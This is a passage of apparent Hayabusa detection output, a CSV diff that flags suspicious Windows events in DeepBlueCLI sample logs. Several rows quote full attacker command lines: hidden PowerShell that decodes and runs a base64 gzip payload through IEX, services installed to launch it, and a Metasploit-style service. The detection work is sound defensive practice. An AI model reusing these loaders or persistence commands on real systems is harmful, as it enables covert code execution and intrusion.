W2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,,New Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
